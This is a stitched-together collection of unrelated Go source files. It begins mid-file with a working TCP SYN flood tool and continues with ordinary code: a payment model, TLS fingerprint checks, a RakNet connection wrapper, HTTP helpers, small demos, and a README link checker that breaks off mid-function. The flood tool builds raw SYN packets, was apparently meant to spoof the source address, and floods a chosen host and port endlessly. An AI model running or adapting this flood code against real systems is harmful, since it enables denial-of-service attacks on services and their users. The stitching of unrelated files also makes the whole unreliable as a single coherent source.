		port = flag.Int("port", 0, "lol")
	)
	flag.Parse()
	return *host, *port
}
// main parses the target host/port from the command line, validates that the
// host is an IPv4 address, and hands it off to the packet flood loop.
func main() {
	host, port := argParser()
	log.Printf("Host and Port: {%s:%d}\n", host, port)

	// To4 returns nil for anything that is not a valid IPv4 address.
	ip := net.ParseIP(host).To4()
	if ip == nil {
		log.Fatal("Invalid Hostname: " + host)
	}
	handle(ip, port)
}
// handle opens a raw IPv4/TCP socket and floods ip:port with hand-built
// packets from three goroutines, printing a running packet count. It never
// returns: the final receive blocks forever on a channel nothing sends to.
func handle(ip net.IP, port int) {
	sock, err := syscall.Socket(syscall.AF_INET, syscall.SOCK_RAW, syscall.IPPROTO_TCP)
	if err != nil {
		log.Fatal(err.Error())
	}
	// Allow to custom IP packets
	// IP_HDRINCL: the IP header is built by us, not the kernel.
	err = syscall.SetsockoptInt(sock, syscall.IPPROTO_IP, syscall.IP_HDRINCL, 1)
	if err != nil {
		log.Fatal(err.Error())
	}
	// NOTE(review): totalSend is incremented from three goroutines without
	// synchronization — a data race; the printed count is best-effort only.
	totalSend := 0
	for i := 0; i < 3; i++ {
		go func() {
			for {
				// NOTE(review): srcIp is always 0.0.0.0 (a zeroed 4-byte
				// slice) — presumably a randomized spoofed source was
				// intended; confirm.
				srcIp := net.IP(make([]byte, 4))
				ipByte := ipHeader{}
				data, err := ipByte.makeHeader(srcIp, ip)
				if err != nil {
					log.Fatal("Error in unpacking ip byte:\t" + err.Error())
				}
				tcpByte := tcpHeader{}
				tcpData, err := tcpByte.makeHeader(srcIp, ip, port)
				if err != nil {
					log.Fatal("Error in unpacking tcp byte:\t" + err.Error())
				}
				// Full packet = IP header bytes followed by TCP header bytes.
				var buff []byte
				buff = append(buff, data...)
				buff = append(buff, tcpData...)
				sockAddr := syscall.SockaddrInet4{}
				sockAddr.Port = port
				copy(sockAddr.Addr[:4], ip)
				totalSend++
				fmt.Print("Total pockets send: " + (strconv.Itoa(totalSend)) + "\r")
				err = syscall.Sendto(sock, buff, 0, &sockAddr)
				if err != nil {
					fmt.Println("Sendto error:\t" + err.Error())
				}
			}
		}()
	}
	// Block forever: nothing ever sends on c.
	c := make(chan int, 1)
	<-c
}
// makeHeader populates the IP header fields for an outgoing packet from
// srcIp to dstIp and returns the serialized header bytes via Marshal.
func (h *ipHeader) makeHeader(srcIp net.IP, dstIp net.IP) ([]byte, error) {
	h.SRCip = srcIp
	h.DSTip = dstIp
	h.PID = 1
	h.TTL = 255
	h.Proto = syscall.IPPROTO_TCP
	// Checksum stays zero here; presumably filled in later (by Marshal or
	// the kernel) — TODO confirm.
	h.HCheckSum = 0
	return h.Marshal()
}
// makeHeader fills in the fields of a TCP SYN header, computes the TCP
// checksum over a pseudo header plus the encoded TCP header, and returns
// the final encoded header bytes.
func (header *tcpHeader) makeHeader(srcIp, destIp net.IP, destPort int) ([]byte, error) {
	header.DestPort = destPort
	// 0x02 is the SYN flag.
	header.Flag = 0x02
	header.AckNum = 0
	header.Window = 2048
	// Randomize source port and initial sequence number per packet.
	header.SourcePort = rand.Intn(65000)
	// NOTE(review): 1<<32 overflows int on 32-bit platforms; this only
	// compiles where int is 64-bit.
	header.SeqNum = rand.Intn(1<<32 - 1)
	// The TCP checksum covers a pseudo header (source/destination IP,
	// protocol, segment length) followed by the TCP header itself.
	var pseudoH *pseudoHeader = &pseudoHeader{}
	copy(pseudoH.SourceIp[:4], srcIp)
	copy(pseudoH.DestIp[:4], destIp)
	pseudoH.ProtoType = syscall.IPPROTO_TCP
	// Segment length is the bare 20-byte TCP header; no payload is sent.
	pseudoH.SegLen = uint16(20)
	pseudoH.Fixed = 0
	var buffer = bytes.Buffer{}
	if err := binary.Write(&buffer, binary.BigEndian, pseudoH); err != nil {
		log.Fatal("Pseudo Header error")
	}
	// First encoding runs with CheckSum still zero, as the algorithm requires.
	tcpBytes, _ := header.Encoding()
	buffer.Write(tcpBytes)
	header.CheckSum = int(CheckSum(buffer.Bytes()))
	// Re-encode with the checksum filled in.
	return header.Encoding()
}
// CheckSum computes the 16-bit one's-complement checksum (RFC 1071) used by
// IP and TCP headers over the given bytes.
//
// The data is summed as big-endian 16-bit words (a trailing odd byte is
// treated as the high byte of a final word), the carries are folded back
// into the low 16 bits until none remain, and the one's complement of the
// result is returned.
//
// Fixes over the previous version: a single `sum += sum >> 16` does not
// fold all carries (e.g. 0x1FFFF -> 0x10000 still carries), and the odd
// trailing byte was added unshifted instead of as the word's high byte.
func CheckSum(data []byte) uint16 {
	var sum uint32
	// Sum successive big-endian 16-bit words.
	for i := 0; i+1 < len(data); i += 2 {
		sum += uint32(data[i])<<8 | uint32(data[i+1])
	}
	// An odd trailing byte occupies the high half of its 16-bit word.
	if len(data)%2 == 1 {
		sum += uint32(data[len(data)-1]) << 8
	}
	// Fold carries until the sum fits in 16 bits.
	for sum>>16 != 0 {
		sum = (sum & 0xFFFF) + (sum >> 16)
	}
	return uint16(^sum)
}
|
package payment
import (
"time"
"github.com/jinzhu/gorm"
"github.com/satori/go.uuid"
"github.com/tppgit/we_service/entity/order"
)
// Values stored in Payment.Status to record the outcome of a payment attempt.
var STATUS_PAYMENT_SUCCESS string = "SUCCESS"
var STATUS_PAYMENT_FAIL string = "FAIL"
// Payment records a single payment attempt against an order, including the
// gateway token/charge identifiers, the outcome, and the raw request and
// response payloads for auditing.
type Payment struct {
	ID      uuid.UUID   `gorm:"type:char(36);primary_key;column:id;not null"`
	OrderID uuid.UUID   `gorm:"type:varchar(36);column:fk_order;not null"`
	Order   order.Order `gorm:"foreignkey:OrderId"`
	// Gateway-issued identifiers for the payment.
	Token    string `gorm:"type:varchar(100);column:token"`
	ChargeID string `gorm:"type:varchar(100);column:chargeid"`
	Email    string `gorm:"type:varchar(100);column:email"`
	// Status holds STATUS_PAYMENT_SUCCESS or STATUS_PAYMENT_FAIL — TODO
	// confirm no other values are written elsewhere.
	Status  string `gorm:"type:varchar(100);column:status"`
	Code    string `gorm:"type:varchar(100);column:code"`
	Message string `gorm:"type:text;column:message"`
	// NOTE(review): "Respone" is misspelled and the column name matches the
	// misspelling; renaming either requires a DB migration.
	RawRespone string `gorm:"type:text;column:raw_respone"`
	RawRequest string `gorm:"type:text;column:raw_request"`
	// NOTE(review): Go type float32 disagrees with the gorm "type:int"
	// column type — confirm which is intended.
	Amount    float32 `gorm:"type:int;column:amount"`
	CreatedAt time.Time
}
// BeforeCreate is a gorm hook that assigns a freshly generated UUID as the
// primary key before the row is inserted.
func (d *Payment) BeforeCreate(scope *gorm.Scope) error {
	return scope.SetColumn("ID", uuid.NewV4())
}
|
package crypto
import (
"crypto/rsa"
"crypto/x509"
"fmt"
"strings"
)
// VerifyByFingerprint verifies TLS peer certificates by comparing a
// fingerprint of the peer's RSA public key against an expected value.
type VerifyByFingerprint struct {
	// Fingerprint is the expected public-key fingerprint.
	Fingerprint string
	// FingerprintChallengeLevel and FingerprintLength are forwarded to
	// FingerprintPublicKey — see that function for their exact semantics.
	FingerprintChallengeLevel uint
	FingerprintLength         uint
}
// VerifyPeerCertificate validates that one of the given certificates contains a public key matching the configured
// fingerprint.
//
// It matches the signature of tls.Config.VerifyPeerCertificate: it returns
// nil as soon as any presented certificate verifies; otherwise the
// individual verification errors are joined into a single error.
func (v *VerifyByFingerprint) VerifyPeerCertificate(rawCerts [][]byte, verifiedChains [][]*x509.Certificate) error {
	// Collect one message per failed certificate. A zero-length slice is
	// required here: the previous make([]string, len(rawCerts)) + append
	// produced leading empty entries in the joined error text, and a stray
	// debug Println fired on the success path.
	errMessages := make([]string, 0, len(rawCerts))
	for _, rawCert := range rawCerts {
		err := v.verifyRawCert(rawCert)
		if err == nil {
			return nil
		}
		errMessages = append(errMessages, err.Error())
	}
	return fmt.Errorf("given certificates not valid: %s", strings.Join(errMessages, ","))
}
// verifyRawCert parses a single DER certificate and checks its RSA public
// key against the configured fingerprint.
func (v *VerifyByFingerprint) verifyRawCert(rawCert []byte) error {
	cert, err := x509.ParseCertificate(rawCert)
	if err != nil {
		return err
	}
	rsaPublicKey, ok := cert.PublicKey.(*rsa.PublicKey)
	if !ok {
		return fmt.Errorf("given certificate must be RSA")
	}
	// @todo #31: check validity, SAN/CommonName, extensions
	return v.verifyPublicKey(rsaPublicKey)
}
// verifyPublicKey fingerprints the given RSA public key with the configured
// challenge level and length, and compares the result with the expected
// fingerprint.
func (v *VerifyByFingerprint) verifyPublicKey(publicKey *rsa.PublicKey) error {
	actual, err := FingerprintPublicKey(publicKey, v.FingerprintChallengeLevel, v.FingerprintLength)
	if err != nil {
		return fmt.Errorf("fingerprint cannot be generated: %s", err)
	}
	if actual == v.Fingerprint {
		return nil
	}
	return fmt.Errorf("actual fingerprint %s differs from configured one", actual)
}
|
package main
import "fmt"
// main demonstrates basic map operations: declaration with a literal,
// inserting a new key, and deleting it again.
func main() {
	// map declaration with initial subject scores
	marks := map[string]int64{
		"maths": 95,
		"phy":   96,
		"chem":  87,
	}

	fmt.Println("marks before update :")
	fmt.Println(marks)

	// Insert a new key/value pair.
	fmt.Println("marks after update (new value added) :")
	marks["computer sci"] = 92
	fmt.Println(marks)

	// Remove the key again with the built-in delete.
	fmt.Println("marks after update (new value deleted)")
	delete(marks, "computer sci")
	fmt.Println(marks)
}
package raknet
import (
"bytes"
"encoding/hex"
"errors"
"io"
"net"
"time"
"unsafe"
"go.uber.org/zap"
"github.com/rssllyn/go-raknet/wrapper"
)
const (
	ConnPacketBuffer = 100 // number of packets to keep and wait for handling
	acceptBacklog = 128 // number of connections to keep and wait for accept
	shutDownNotifyDuration = 100 // milliseconds
)

// Logger is the package-wide zap logger; callers may replace it.
var Logger *zap.Logger

// init installs a development-mode logger by default. The construction
// error is deliberately discarded — NOTE(review): Logger would be nil if
// zap.NewDevelopment ever failed; confirm callers tolerate that.
func init() {
	Logger, _ = zap.NewDevelopment()
}
// Conn is a net.Conn implementation backed by a RakNet peer.
type Conn struct {
	peer wrapper.RakPeerInterface
	buff []byte // first packet data, buff it for reading multiple times
	buffReadIdx int // start index in buff that has not been read
	// chData delivers received user-packet payloads to Read.
	chData chan []byte //
	remoteAddressOrGUID wrapper.AddressOrGUID // used to specify remote peer when Send
	localAddress net.Addr
	remoteAddress net.Addr
	// indicates whether the connection is opened as a client peer
	// the RakPeerInterface will only be ShutDown for client connection, which is expected to connect to only one server
	isClient bool
	// done is closed when the connection is lost or the remote disconnects.
	done chan struct{}
}
// monitor polls the RakNet peer for packets and dispatches each one; it is
// intended to run in its own goroutine for a client connection.
func (c *Conn) monitor() {
	for {
		packet := c.peer.Receive()
		if unsafe.Pointer(packet.(wrapper.SwigcptrPacket).Swigcptr()) != nil {
			c.handlePacket(packet)
			continue
		}
		// Nothing pending; back off briefly before polling again.
		time.Sleep(10 * time.Millisecond)
	}
}
// handlePacket routes one received packet for a client peer: user payloads
// go to chData, while disconnect/lost notifications close the done channel.
func (c *Conn) handlePacket(packet wrapper.Packet) {
	defer c.peer.DeallocatePacket(packet)

	identifier := wrapper.GetPacketIdentifier(packet)
	Logger.Info("packet received", zap.Int("message identifier", int(identifier)))

	switch wrapper.DefaultMessageIDTypes(identifier) {
	case wrapper.ID_USER_PACKET_ENUM:
		payload := []byte(wrapper.GetPacketPayload(packet))
		c.chData <- payload
		Logger.Debug("packet data", zap.String("hex", hex.EncodeToString(payload)))
	case wrapper.ID_DISCONNECTION_NOTIFICATION, wrapper.ID_CONNECTION_LOST:
		// NOTE(review): if both notifications ever arrive, the second close
		// would panic — presumably the wrapper delivers only one; confirm.
		Logger.Debug("connection lost")
		close(c.done)
	}
}
// Read copies received packet data into b, blocking until data is
// available. Bytes left over from a packet larger than b are returned by
// subsequent calls. Once the connection is done and all buffered packets
// have been drained, it returns io.EOF.
func (c *Conn) Read(b []byte) (int, error) {
	for len(c.buff) == 0 {
		select {
		case c.buff = <-c.chData:
			c.buffReadIdx = 0
		case <-c.done:
			// Drain any packets still queued before reporting EOF.
			if len(c.chData) > 0 {
				Logger.Debug("connection closed, but still have data unprocessed, will process first")
			} else {
				return 0, io.EOF
			}
		}
	}
	n := copy(b, c.buff[c.buffReadIdx:])
	if n == len(c.buff)-c.buffReadIdx {
		// Whole buffer consumed; reset so the next Read pulls a new packet.
		c.buff = []byte{}
	} else {
		c.buffReadIdx += n
	}
	return n, nil
}
// Write sends b to the remote peer as a single reliable-ordered user packet,
// tagged with ID_USER_PACKET_ENUM. Writing an empty slice is a no-op.
func (c *Conn) Write(b []byte) (int, error) {
	if len(b) == 0 {
		return 0, nil
	}
	var buff bytes.Buffer
	// The first byte identifies the payload as a user packet.
	buff.WriteByte(byte(wrapper.ID_USER_PACKET_ENUM))
	buff.Write(b)
	// wrapper requires the data sent (char* type in c++) to be ended with \0 character
	buff.WriteByte(0)
	sent := c.peer.Send(string(buff.Bytes()), buff.Len(), wrapper.HIGH_PRIORITY, wrapper.RELIABLE_ORDERED, byte(0), c.remoteAddressOrGUID, false)
	// NOTE(review): Swigcptr() is used here as the sent-byte count —
	// presumably that is how the SWIG wrapper surfaces it; confirm.
	if int(sent.Swigcptr()) < buff.Len() {
		return int(sent.Swigcptr()), errors.New("not all data sent")
	}
	return len(b), nil
}
// Close shuts down the underlying peer for client connections. Server-side
// sessions share the listener's peer, so closing them is a no-op.
func (c *Conn) Close() error {
	if !c.isClient {
		return nil
	}
	c.peer.Shutdown(uint(shutDownNotifyDuration))
	return nil
}
// LocalAddr returns the local network address, if known.
func (c *Conn) LocalAddr() net.Addr {
	return c.localAddress
}

// RemoteAddr returns the remote peer's network address.
func (c *Conn) RemoteAddr() net.Addr {
	return c.remoteAddress
}

// SetDeadline is a no-op; deadlines are not supported by this transport.
func (c *Conn) SetDeadline(t time.Time) error {
	return nil
}

// SetReadDeadline is a no-op; read deadlines are not supported.
func (c *Conn) SetReadDeadline(t time.Time) error {
	return nil
}

// SetWriteDeadline is a no-op; write deadlines are not supported.
func (c *Conn) SetWriteDeadline(t time.Time) error {
	return nil
}
// waitForConnectionAccepted blocks until an ID_CONNECTION_REQUEST_ACCEPTED
// packet is received from the wrapper and returns the remote address/GUID.
// NOTE(review): despite the original comment, this loop never returns an
// error; every other packet type is silently discarded.
func waitForConnectionAccepted(peer wrapper.RakPeerInterface) (wrapper.AddressOrGUID, error) {
	for {
		packet := peer.Receive()
		if unsafe.Pointer(packet.(wrapper.SwigcptrPacket).Swigcptr()) == nil {
			// No packet pending; poll again shortly.
			time.Sleep(10 * time.Millisecond)
			continue
		}
		identifier := wrapper.GetPacketIdentifier(packet)
		if wrapper.DefaultMessageIDTypes(identifier) == wrapper.ID_CONNECTION_REQUEST_ACCEPTED {
			addressOrGUID := wrapper.NewAddressOrGUID(packet)
			peer.DeallocatePacket(packet)
			return addressOrGUID, nil
		}
		peer.DeallocatePacket(packet)
	}
}
// Dial connects to the RakNet server at raddr ("host:port") and returns a
// net.Conn once the server accepts the connection. The local port is chosen
// by the OS (socket descriptor port 0).
func Dial(raddr string) (net.Conn, error) {
	remoteUDPAddr, err := net.ResolveUDPAddr("udp", raddr)
	if err != nil {
		return nil, err
	}
	if remoteUDPAddr.IP == nil {
		return nil, errors.New("no server ip address specified")
	}
	Logger.Debug("connecting to server", zap.String("server address", remoteUDPAddr.String()))
	peer := wrapper.RakPeerInterfaceGetInstance()
	socketDescriptor := wrapper.NewSocketDescriptor(uint16(0), "")
	Logger.Debug(
		"local address before connect",
		zap.String("host", socketDescriptor.GetHostAddress()),
		zap.Uint16("port", socketDescriptor.GetPort()),
	)
	// A client peer talks to exactly one server.
	var maxConnectionCount uint = 1
	var socketDescriptorCount uint = 1
	peer.Startup(maxConnectionCount, socketDescriptor, socketDescriptorCount)
	// No password is used; zero values are passed through.
	var password string
	var passwordLength int
	peer.Connect(remoteUDPAddr.IP.String(), uint16(remoteUDPAddr.Port), password, passwordLength)
	// NOTE(review): Startup/Connect results are ignored; if the connect
	// fails, waitForConnectionAccepted blocks forever — confirm.
	addressOrGUID, err := waitForConnectionAccepted(peer)
	if err != nil {
		return nil, err
	}
	Logger.Debug(
		"local address after connected",
		zap.String("host", socketDescriptor.GetHostAddress()),
		zap.Uint16("port", socketDescriptor.GetPort()),
	)
	conn := &Conn{
		chData: make(chan []byte, ConnPacketBuffer),
		peer: peer,
		remoteAddressOrGUID: addressOrGUID,
		isClient: true,
		done: make(chan struct{}),
		remoteAddress: remoteUDPAddr,
	}
	// Receive loop runs for the lifetime of the process.
	go conn.monitor()
	return conn, nil
}
// Listener accepts incoming RakNet connections; it implements net.Listener.
type Listener struct {
	peer wrapper.RakPeerInterface
	// sessions maps RakNet system indexes to their live connections.
	sessions map[uint16]*Conn
	// chAccepts queues newly established sessions for Accept.
	chAccepts chan *Conn
	listenAddress net.Addr
}
// Accept blocks until a new incoming connection is available and returns it.
func (l *Listener) Accept() (net.Conn, error) {
	conn := <-l.chAccepts
	return conn, nil
}
// Close shuts down the listening peer, giving connected peers a brief
// notification window.
func (l *Listener) Close() error {
	l.peer.Shutdown(uint(shutDownNotifyDuration))
	return nil
}

// Addr returns the listener's local network address.
func (l *Listener) Addr() net.Addr {
	return l.listenAddress
}
// monitor polls the listening peer for packets and dispatches each one,
// creating sessions as necessary; it runs in its own goroutine.
func (l *Listener) monitor() {
	for {
		packet := l.peer.Receive()
		if unsafe.Pointer(packet.(wrapper.SwigcptrPacket).Swigcptr()) != nil {
			l.handlePacket(packet)
			continue
		}
		// No packet pending; poll again shortly.
		time.Sleep(10 * time.Millisecond)
	}
}
// handlePacket routes one received packet on the listener side: new
// connections become sessions handed to Accept, user payloads are forwarded
// to the owning session, and disconnect/lost notifications close the
// session's done channel.
func (l *Listener) handlePacket(packet wrapper.Packet) {
	defer l.peer.DeallocatePacket(packet)
	identifier := wrapper.GetPacketIdentifier(packet)
	Logger.Info("packet received", zap.Int("message identifier", int(identifier)))
	switch wrapper.DefaultMessageIDTypes(identifier) {
	case wrapper.ID_NEW_INCOMING_CONNECTION:
		if len(l.chAccepts) >= cap(l.chAccepts) {
			// prevent packet receiving of existing sessions being blocked
			// NOTE(review): the connection is silently dropped here without
			// notifying the remote peer — confirm that is acceptable.
			return
		}
		ra := packet.GetSystemAddress().ToString(true, []byte(":")[0]).(string)
		Logger.Debug("remote address", zap.String("ip:port", ra))
		remoteAddress, err := net.ResolveUDPAddr("udp", ra)
		if err != nil {
			// Resolution failure is tolerated; the session keeps a nil
			// remote address.
			Logger.Warn("failed to get remote address", zap.Error(err))
		}
		sess := &Conn{
			chData: make(chan []byte, ConnPacketBuffer),
			peer: l.peer,
			remoteAddressOrGUID: wrapper.NewAddressOrGUID(packet),
			isClient: false,
			done: make(chan struct{}),
			localAddress: l.listenAddress,
			remoteAddress: remoteAddress,
		}
		// get unique ID for this session, notice that when wrapper detects connection lost,
		// corresponding session ID would be reused in latter incomming connections
		sessionID := packet.GetGuid().GetSystemIndex()
		l.sessions[sessionID] = sess
		l.chAccepts <- sess
		Logger.Debug("new incoming connection received", zap.Uint16("session ID", sessionID))
	case wrapper.ID_USER_PACKET_ENUM:
		data := []byte(wrapper.GetPacketPayload(packet))
		sessionID := packet.GetGuid().GetSystemIndex()
		if sess, ok := l.sessions[sessionID]; ok {
			sess.chData <- data
			Logger.Debug("packet received for session", zap.Uint16("session ID", sessionID))
		}
	case wrapper.ID_DISCONNECTION_NOTIFICATION:
		Logger.Debug("connection lost")
		sessionID := packet.GetGuid().GetSystemIndex()
		if sess, ok := l.sessions[sessionID]; ok {
			close(sess.done)
		}
	case wrapper.ID_CONNECTION_LOST:
		Logger.Debug("connection lost")
		sessionID := packet.GetGuid().GetSystemIndex()
		if sess, ok := l.sessions[sessionID]; ok {
			close(sess.done)
		}
	}
}
// Listen starts a RakNet peer on laddr ("host:port") accepting up to
// maxConnections concurrent connections and returns it as a net.Listener.
func Listen(laddr string, maxConnections int) (net.Listener, error) {
	udpAddr, err := net.ResolveUDPAddr("udp", laddr)
	if err != nil {
		return nil, err
	}
	// An empty host binds to all interfaces.
	var ip string
	if udpAddr.IP != nil {
		ip = udpAddr.IP.String()
	}
	peer := wrapper.RakPeerInterfaceGetInstance()
	socketDescriptor := wrapper.NewSocketDescriptor(uint16(udpAddr.Port), ip)
	var socketDescriptorCount uint = 1
	// NOTE(review): Startup's result is ignored; a bind failure would only
	// surface as a silent listener — confirm.
	peer.Startup(uint(maxConnections), socketDescriptor, socketDescriptorCount)
	peer.SetMaximumIncomingConnections(uint16(maxConnections))
	l := &Listener{
		peer: peer,
		sessions: make(map[uint16]*Conn),
		chAccepts: make(chan *Conn, acceptBacklog),
		listenAddress: udpAddr,
	}
	// Receive loop runs for the lifetime of the listener.
	go l.monitor()
	return l, nil
}
|
package loglib
import (
"context"
"github.com/sirupsen/logrus"
)
// contextKey is a private key type, preventing collisions with context keys
// defined in other packages.
type contextKey string

// loggerContextKey is the context key under which a *logrus.Logger is stored.
var loggerContextKey = contextKey("logger")
// SetLogger sets the logger into the provided context and returns a copy
// of ctx carrying it; retrieve it again with GetLogger.
func SetLogger(ctx context.Context, value *logrus.Logger) context.Context {
	return context.WithValue(ctx, loggerContextKey, value)
}
// GetLogger returns logger object from Context, else, return default concise logger
func GetLogger(ctx context.Context) *logrus.Logger {
if logger, ok := ctx.Value(loggerContextKey).(*logrus.Logger); ok {
return logger
}
return logrus.StandardLogger()
}
|
/*
145 is a curious number, as 1! + 4! + 5! = 1 + 24 + 120 = 145.
Find the sum of all numbers which are equal to the sum of the factorial of their digits.
Note: as 1! = 1 and 2! = 2 are not sums they are not included.
*/
package main
import (
"fmt"
)
// factorial maps each decimal digit to its factorial (0! through 9!).
var factorial = map[int]int{
	0: 1,
	1: 1,
	2: 2,
	3: 6,
	4: 24,
	5: 120,
	6: 720,
	7: 5040,
	8: 40320,
	9: 362880,
}

// digitFactorialSum returns the sum of the factorials of n's decimal digits.
func digitFactorialSum(n int) int {
	total := 0
	for n > 0 {
		total += factorial[n%10]
		n /= 10
	}
	return total
}

// main prints every number equal to the sum of the factorials of its digits
// (Project Euler 34; 1 and 2 are excluded as trivial non-sums), followed by
// their total.
func main() {
	// Upper bound: a number with d digits is at least 10^(d-1), while its
	// largest possible digit-factorial sum is d*9!. Since 8*9! = 2903040 is
	// below the smallest 8-digit number, 7*9! = 2540160 is a safe search
	// limit. (The previous bound of 2,500,000 undershot this slightly,
	// though no solutions happen to lie in the gap.)
	const limit = 7 * 362880

	sum := 0
	for i := 10; i <= limit; i++ {
		if digitFactorialSum(i) == i {
			fmt.Println(i)
			sum += i
		}
	}
	fmt.Println(sum)
}
|
package services
import (
"encoding/json"
"fmt"
"net/http"
"strings"
"github.com/albimcleod/go-modish/authentication"
jwt "github.com/dgrijalva/jwt-go"
"github.com/gorilla/mux"
)
// BaseService is an service to handle data requests
type BaseService struct {
Name string
}
// HandleError returns the error response
func (service *BaseService) HandleError(w http.ResponseWriter, err error, status int) bool {
if err != nil {
fmt.Printf("HandleError - %v\n", err)
service.WriteHeaderStatus(w, status)
if err := json.NewEncoder(w).Encode(err); err != nil {
fmt.Printf("HandleError.Encode - %v\n", err)
panic(err)
}
return true
}
return false
}
// WriteHeaderStatus writes the json content header
func (service *BaseService) WriteHeaderStatus(w http.ResponseWriter, status int) {
w.Header().Set("Content-Type", "application/json; charset=UTF-8")
w.WriteHeader(status)
}
// HandleNotFound returns the not found status code
func (service *BaseService) HandleNotFound(w http.ResponseWriter) {
service.WriteHeaderStatus(w, http.StatusNotFound)
}
// GetParam returns the value of the named mux route parameter.
func (service *BaseService) GetParam(param string, r *http.Request) string {
	return mux.Vars(r)[param]
}
// GetQuery returns the first value of the named query-string parameter, or
// the empty string when it is absent.
func (service *BaseService) GetQuery(param string, r *http.Request) string {
	values := r.URL.Query()[param]
	if len(values) == 0 {
		return ""
	}
	return values[0]
}
// GetAuthorizationToken returns the parsed authorization token.
//
// It reads the bearer token from the Authorization header and parses it
// with the given secret; a missing or empty token yields an error.
func (service *BaseService) GetAuthorizationToken(secret string, r *http.Request) (*jwt.Token, error) {
	var raw string
	if tokens, ok := r.Header["Authorization"]; ok && len(tokens) >= 1 {
		raw = strings.TrimPrefix(tokens[0], "Bearer ")
	}
	if raw == "" {
		return nil, fmt.Errorf("No Token")
	}
	return authentication.ParseToken(raw, secret)
}
|
package shared
import (
"github.com/cli/cli/v2/pkg/cmdutil"
"github.com/google/shlex"
"github.com/spf13/cobra"
)
// ExistingCommandFunc returns a function that will check if the given string
// corresponds to an existing command.
//
// The returned predicate tokenizes its argument shell-style, walks the
// cobra command tree from the root, and falls back to matching installed
// extension names against the first token.
func ExistingCommandFunc(f *cmdutil.Factory, cmd *cobra.Command) func(string) bool {
	return func(args string) bool {
		fields, err := shlex.Split(args)
		if err != nil || len(fields) == 0 {
			return false
		}
		// Use locals throughout: the previous version assigned Traverse's
		// result back to the captured cmd parameter, so a later invocation
		// called Root() on whatever the previous call found (possibly nil
		// after a Traverse error).
		rootCmd := cmd.Root()
		if found, _, err := rootCmd.Traverse(fields); err == nil && found != rootCmd {
			return true
		}
		for _, ext := range f.ExtensionManager.List() {
			if ext.Name() == fields[0] {
				return true
			}
		}
		return false
	}
}
|
package collection
import "github.com/scjalliance/drivestream/page"
// Reader provides readonly access to a collection.
type Reader struct {
	ref Reference
	// nextState and nextPage cache the sequence numbers that would be
	// assigned to the next written state/page, captured at construction.
	nextState StateNum
	nextPage page.SeqNum
}
// NewReader returns a collection reader for the given sequence number.
func NewReader(ref Reference) (*Reader, error) {
	states, err := ref.States().Next()
	if err != nil {
		return nil, err
	}
	pages, err := ref.Pages().Next()
	if err != nil {
		return nil, err
	}
	r := &Reader{
		ref:       ref,
		nextState: states,
		nextPage:  pages,
	}
	return r, nil
}
// Data returns information about the collection.
func (r *Reader) Data() (Data, error) {
	return r.ref.Data()
}

// NextState returns the state number of the next state to be written.
func (r *Reader) NextState() StateNum {
	return r.nextState
}

// LastState returns the last state of the collection.
// NOTE(review): when no states exist nextState is 0, so this requests
// state nextState-1 — presumably the underlying ref reports an error for
// that; confirm.
func (r *Reader) LastState() (State, error) {
	return r.State(r.nextState - 1)
}

// State returns the requested state from the collection.
func (r *Reader) State(stateNum StateNum) (State, error) {
	return r.ref.State(stateNum).Data()
}
// States returns a slice of all states of the collection in ascending
// order.
func (r *Reader) States() ([]State, error) {
	if r.nextState == 0 {
		// No states have been written yet.
		return nil, nil
	}
	out := make([]State, r.nextState)
	n, err := r.ref.States().Read(0, out)
	if err != nil {
		return nil, err
	}
	if n != len(out) {
		return nil, StatesTruncated{Drive: r.ref.Drive(), Collection: r.ref.SeqNum()}
	}
	return out, nil
}
// NextPage returns the page number of the next page to be written
func (r *Reader) NextPage() page.SeqNum {
	return r.nextPage
}

// LastPage returns the last page from the collection.
// NOTE(review): when no pages exist nextPage is 0, so this requests page
// nextPage-1 — presumably the underlying ref reports an error; confirm.
func (r *Reader) LastPage() (page.Data, error) {
	return r.Page(r.nextPage - 1)
}

// Page returns the requested page from the collection.
func (r *Reader) Page(pageNum page.SeqNum) (page.Data, error) {
	return r.ref.Page(pageNum).Data()
}
// Pages returns a slice of all pages within the collection in ascending
// order.
//
// Note that this may allocate a significant amount of memory for large
// collections.
//
// TODO: Consider making this a buffered call.
func (r *Reader) Pages() ([]page.Data, error) {
	if r.nextPage == 0 {
		// Nothing has been written yet.
		return nil, nil
	}
	out := make([]page.Data, r.nextPage)
	n, err := r.ref.Pages().Read(0, out)
	if err != nil {
		return nil, err
	}
	if n != len(out) {
		return nil, PagesTruncated{Drive: r.ref.Drive(), Collection: r.ref.SeqNum()}
	}
	return out, nil
}
|
// go_06
package main
import (
"fmt"
)
// main demonstrates Go arrays: literal declaration, element-wise filling,
// multi-dimensional arrays, and how fixed-size arrays differ from slices
// when passed to functions.
func main() {
	// Array literal: the element count must not exceed the declared size;
	// with [...] the size would be inferred from the literal instead.
	var first = [5]float32{1000.0, 1.1, 2.3, 6.5, 10.0}
	fmt.Println(first)

	// Fill a fixed-size array element by element.
	var second [10]int
	for index := 0; index < 10; index++ {
		second[index] = index + 1
		fmt.Printf("second[%d] = %d\n", index, second[index])
	}

	// Two-dimensional array: var name [SIZE1][SIZE2]type.
	third := [3][4]int{
		{0, 1, 2, 3},
		{4, 5, 6, 7},
		{8, 9, 10, 11}}
	fmt.Println(third)

	// A fixed-size array carries its length in the type and is copied
	// when passed by value.
	var four = [5]int{1, 2, 3, 4, 5}
	setArray_len(four)

	// A slice's length is known only at runtime.
	var five = []int{6, 7, 8, 9}
	setArray(five)
}
// setArray accepts a slice; len reports its runtime length.
func setArray(params []int) {
	fmt.Println("len(Array) = ", len(params))
}

// setArray_len accepts a fixed-size array (copied by value); its length is
// part of the type.
func setArray_len(params [5]int) {
	fmt.Println("len(Array) = ", len(params))
}
package plugin
import (
"bytes"
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"net/http"
"os"
"path/filepath"
"regexp"
"strings"
"sync"
"github.com/grafana/plugin-validator/pkg/grafana"
"github.com/xeipuuv/gojsonschema"
)
type linkChecker struct{}

// check scans the README for Markdown links. Relative links are reported as
// errors, and every absolute http(s) URL is probed concurrently; URLs that
// fail to resolve or return a non-200 status are reported as broken.
func (c linkChecker) check(ctx *checkContext) ([]ValidationComment, error) {
	var errs []ValidationComment

	mdLinks := regexp.MustCompile(`\[.+?\]\((.+?)\)`)
	matches := mdLinks.FindAllSubmatch(ctx.Readme, -1)

	var urls []string
	for _, m := range matches {
		path := string(m[1])
		if strings.HasPrefix(path, "#") {
			// Named anchors are allowed, but not checked.
			continue
		}
		// Strip optional alt text for images, e.g. .
		fields := strings.Fields(path)
		if len(fields) > 0 {
			path = fields[0]
		}
		if strings.HasPrefix(path, "https://") || strings.HasPrefix(path, "http://") {
